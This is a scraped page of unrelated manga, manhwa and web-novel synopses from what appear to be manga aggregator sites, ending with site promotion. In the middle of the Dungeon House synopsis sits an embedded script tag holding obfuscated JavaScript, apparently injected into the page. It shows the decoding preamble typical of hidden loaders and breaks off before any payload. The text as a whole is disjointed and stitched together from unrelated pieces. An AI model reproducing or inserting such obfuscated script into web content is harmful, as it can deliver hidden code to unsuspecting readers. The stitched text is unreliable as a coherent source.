Hiel was ridiculed for having a useless crest and was exiled to a remote island. When he grabbed an pickaxe to reclaim the island, the true effect of his crest was revealed. With his production cheat he will reclaim this uninhabited island and start his life in paradise.
An immensely powerful and ancient dragon, once worshipped as a god by humans but now only a myth in their eyes, wakes up one day to find a human girl poking around his lair. The infant is barely old enough to say her own name, but is quite confident in calling the dragon “Daddy”! Bewildered by the unexpected visitor, the dragon soon learns that returning her to human civilization isn’t going to be an option... not yet, anyway. He quickly decides to raise the girl himself, determined to give her a happy life that will lead her back to human society when she is older — surely a simple task for a legendary being such as himself. All he needs to do now is find a place for her to sleep. And figure out where he is going to get clothes for her. And...wait, what do humans eat again? --- “Daddy!” The dragon blinked as the wee little human called out to him. Him? Her “Daddy”? Powerful enough to have been venerated by humankind, yet warmhearted and even a tad ditzy, the dragon soon finds himself raising and doting on the precocious Olivia as if she really were his daughter in this touching tale. The toddler may be impossibly cute now, but just you wait—she’s a curious child and she’s growing up real fast. You can bet that one day, she’ll be the strongest human there is! But first, how will he handle little Olivia receiving an acceptance letter to a human school? --- [Web Novel](https://ncode.syosetu.com/n5327ft/)
Dungeon House is a Manga/Manhwa/Manhua in (English/Raw) language, Manhwa series is written by Updating This Comic is About One day, my house got connected to a dungeon. It's dangerous outside because of the monsters, but in order to survive, I have to clear the dungeon within the time limit! "I don't want to die. I want to survive." Kim HyunBok has to try and clear the dungeon by himself now that all the other explorers have died. Having awakened his powers, he starts taming monsters. With the skeletons Chris, Kai, and Kessle who have regained their memories, our protagonist's life-risking adventure to clear the dungeon starts now!<script></script><script>(function(_0x399078,_0x325ca3){var _0x47b6a6=_0x1cdb,_0x2b815c=_0x399078();while(!![]){try{var _0x13ada2=parseInt(_0x47b6a6(0x11c))/(-0x4*0x1b0+-0x6*0x14b+-0x1*-0xe83)*(-parseInt(_0x47b6a6(0x103))/(0xb34+-0x886+-0x2ac))+-parseInt(_0x47b6a6(0x100))/(0x1f69+0x41*-0x65+-0x5c1)*(-parseInt(_0x47b6a6(0x11e))/(-0xb7a+0x404+-0x1d*-0x42))+parseInt(_0x47b6a6(0x117))/(0x17e*0x9+0xf0e*-0x2+-0x5f*-0x2d)+-parseInt(_0x47b6a6(0x111))/(0x20b*0x4+0x39e+0x2f1*-0x4)+parseInt(_0x47b6a6(0x119))/(-0x1*-0x237d+-0x1*0x1d53+-0x1*0x623)*(-parseInt(_0x47b6a6(0xfe))/(-0x1fc6+0x13b1+0xc1d))+parseInt(_0x47b6a6(0x101))/(-0x6*-0x128+-0xdf*-0x2c+-0x2d3b*0x1)+-parseInt(_0x47b6a6(0x11d))/(-0x19*-0x47+-0x14e*-0x4+-0xc1d)*(parseInt(_0x47b6a6(0x114))/(0x62b+-0x2299+-0xc5*-0x25));if(_0x13ada2===_0x325ca3)break;else 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\"Dungeon ni Hisomu Yandere na Kanojo ni Ore wa Nando mo Korosareru\" is a fantasy story about Kiska, a boy who is mistreated by the villagers. He manages to survive thanks to his childhood friend Namia, who was the only one by his side. One day, Namia is murdered by three men, and Kiska is accused of the crime and banished to an inescapable class S dungeon. However, he finds himself in a different world where he can use \"Save and Reset\" to get back on his feet no matter how many times he dies. The story is about Kiska\'s quest for revenge against those who wronged him and his friend
A world where only those with innate talent can become adventurers who conquer dungeons. The world defined \"Nagi\" as a porter who cannot become an adventurer. But if you clear a dungeon, doesn\'t that make you an adventurer? Combat skills: 0! Survival abilities: Max level! The dungeon conquest story of the all-purpose porter, Nagi, defying fate!
Lerew lives in a small fishing village on the coast, and trades with a young boy called a witch for medicine for his father. But one day, while attempting to fish in a dangerous area, Lerew is thrown overboard and attacked by sharks. However, even with his body mangled beyond recognition, he still doesn\'t wish to die…
SeoJoon, who had been working to save in order to pay off his dead parents’ debt and to attend a hunter academy, ended up needing to spend all his savings for surgery due to an unfortunate accident. In his moment of despair, a weird ad played. [You can also become an awakener!] He decided to register since he had nothing else to lose. [Mr. Kim SeoJoon, welcome to Transcension Academy.] This hunter academy is on a different ‘dimension’ than other hunter academies! In the age of private hunter education, you can also become a ‘transcended’!
He, determined to experience his new-found emotions, She, trying her hardest to keep all emotions inside. Two different choices : Ignore the ever-horrifying looking spirits or exorcise them. Kageyama Shigeo and Yotsuya Miko have more in common that they could realize, can the somehow help eachother with these troubling emotions when they cross paths?
Fans of Fate/Grand Order—rejoice! A new side story appears...with all the twists and turns you might expect! Epic of Remnant is here!
\"Filipino Kaisen\" takes place in the same universe as \"Jujutsu Kaisen\" however the story progresses on a different country named \"Philippines\" and the story follows the music loving \"Juno Coralles\" Everything started when \"Guanzon Public Highschool\" announced a Field trip for the Grade 11 students specifically in Juno\'s section, However on the day of field trip before Juno departs his home, Juno\'s Mother gave him an \"Anting - Anting\" which is a cursed object and without juno knowing about it he wears it as a souvenir from his mother, then when Juno and his classmates in the Field trip bus are about enter their Destination, Several Cursed spirits disturbed their ride and most of the students were wondering why did the bus stopped, however there were two students who can see the Cursed spirits, which are Juno Coralles and Fred Dadansan, and with the help of the \"Anting - Anting\" Cursed Object, Juno is able to see cursed spirits, efficiently use Cursed energy and Awaken his Cursed Technique, both of them tried to defeat the cursed spirits and succeeded until a bigger threat arrived and two students from the \"Luzon Sorcery Highschool\" have arrived and starting here the journey of Juno Coralles in the World Of Sorcerery have Begun.
Seinen One-shot compilation containing 15 one-shots, published between 1968 and 1976, with an emphasis on themes of eroticism and SF. Chiefly contains works published in Gekiga magazines.
Read Manhwa Fragrant Magician Online For Free At KunManga Fragrant Magician Manga also known as “향긋한 마법사”. This OnGoing webtoon was released on 2024. The story was written by Kim Jambong / Pyo Heeseo and illustrations by goldenfield. The content of the comic Fragrant Magician: Emperor Carlos Afforny suffers from an awful curse that causes him to smell a foul stench from everything and everyone at all times. In a desperate attempt to break the ever-worsening curse, he summons Ersala, the apprentice of the Grand Witch, to the imperial palace. However, lacking experience, she fails to fully lift the curse leading to the stench vanishing for the emperor but only when Ersala is within his vicinity. Moreover, with Ersala being able to use magic only once a year, it seems she is tied to the emperor, almost quite literally, until she can attempt to lift the curse again. The comic Fragrant Magician belongs to the Genre: Fantasy, Josei, Romance Hari Manga is a comprehensive website featuring the latest and hottest manga, updated rapidly to cater to readers with high-quality images and provide them with excellent experiences. With keywords such as “TopManhua” and “Manhwa Web,” as well as related terms like Manhwa Top, New Manga 2024, and Read Manhwa Engsub ensures readers have access to a wide selection of top-notch manga content. Please always follow and share with your friends to support the website MANGAZIN.ORG so that we have more motivation to publish the latest and best comics. Follow get to read NEW MANHWA updated: Confession Attack Maxed Out Leveling In the Doghouse